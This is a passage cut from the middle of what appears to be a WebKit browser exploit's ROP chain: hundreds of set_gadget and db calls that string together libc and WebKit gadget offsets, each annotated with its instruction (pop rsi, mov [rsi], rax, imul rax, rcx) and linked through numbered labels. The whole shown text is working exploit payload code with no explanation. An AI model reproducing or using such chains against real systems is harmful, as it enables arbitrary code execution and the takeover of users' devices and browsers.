ropchain+89528, //L596
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L596:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+89584, //L597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L597:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+89680, //L600
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L599:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L600:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L601:
db([1, 0]); // 0x1
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+89776, //L602
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+89792, //L603
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L602:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L603:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+89880, //L605
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L605:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+89936, //L606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L606:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+90008, //L609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L609:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+90064, //L610
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L610:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+90152, //L612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L612:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L614:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+90272, //L617
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+90256, //L615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L615:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L617:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+90416, //L620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+90384, //L618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+90400, //L619
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L618:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L619:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L620:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+90488, //L622
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L622:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+90544, //L623
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L623:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+90640, //L626
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L625:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L626:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L627:
db([8, 0]); // 0x8
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+90736, //L628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+90752, //L629
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L628:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L629:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+90840, //L631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L631:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+90896, //L632
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L632:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+91000, //L634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L634:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L636:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+91120, //L639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+91104, //L637
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L637:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L639:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+91264, //L642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+91232, //L640
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+91248, //L641
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L640:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L641:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L642:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+91336, //L644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L644:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+91392, //L645
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L645:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+91488, //L648
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L647:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L648:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L649:
db([7, 0]); // 0x7
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+91584, //L650
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+91600, //L651
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L650:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L651:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+91688, //L653
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L653:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+91744, //L654
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L654:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+91816, //L657
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L657:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+91872, //L658
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L658:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+91960, //L660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L660:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L662:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+92080, //L665
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+92064, //L663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L663:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L665:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+92224, //L668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+92192, //L666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+92208, //L667
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L666:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L667:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L668:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+92304, //L669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L669:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L671:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+92424, //L674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+92408, //L672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L672:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L674:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+92568, //L677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+92536, //L675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+92552, //L676
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L675:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L676:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L677:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+92640, //L679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L679:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+92696, //L680
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L680:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+92792, //L683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L682:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L683:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L684:
db([8, 0]); // 0x8
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+92888, //L685
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+92904, //L686
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L685:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L686:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+92992, //L688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L688:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+93048, //L689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L689:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+93120, //L692
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L692:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+93176, //L693
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L693:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L695:
libc_base+755774, //mov rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+93312, //L696
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L696:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L698:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+93432, //L701
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+93416, //L699
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L699:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L701:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+93576, //L704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+93544, //L702
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+93560, //L703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L702:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L703:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L704:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+93648, //L706
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L706:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+93704, //L707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L707:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+93800, //L710
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L709:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L710:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L711:
db([9, 0]); // 0x9
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+93896, //L712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+93912, //L713
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L712:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L713:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+94000, //L715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L715:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+94056, //L716
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L716:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+94128, //L719
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L719:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+94184, //L720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L720:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L722:
libc_base+764760, //pop rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+94320, //L723
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L723:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L725:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+94440, //L728
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+94424, //L726
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L726:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L728:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+94584, //L731
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+94552, //L729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+94568, //L730
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L729:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L730:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L731:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+94656, //L733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L733:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+94712, //L734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L734:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+94808, //L737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L736:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L737:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L738:
db([10, 0]); // 0xa
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+94904, //L739
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+94920, //L740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L739:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L740:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+95008, //L742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L742:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+95064, //L743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L743:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+95136, //L746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L746:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+95192, //L747
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L747:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+95280, //L749
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L749:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L751:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+95400, //L754
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+95384, //L752
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L752:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L754:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+95544, //L757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+95512, //L755
webkit_base+660161, //mov [rsi], rax ; mov al, 1
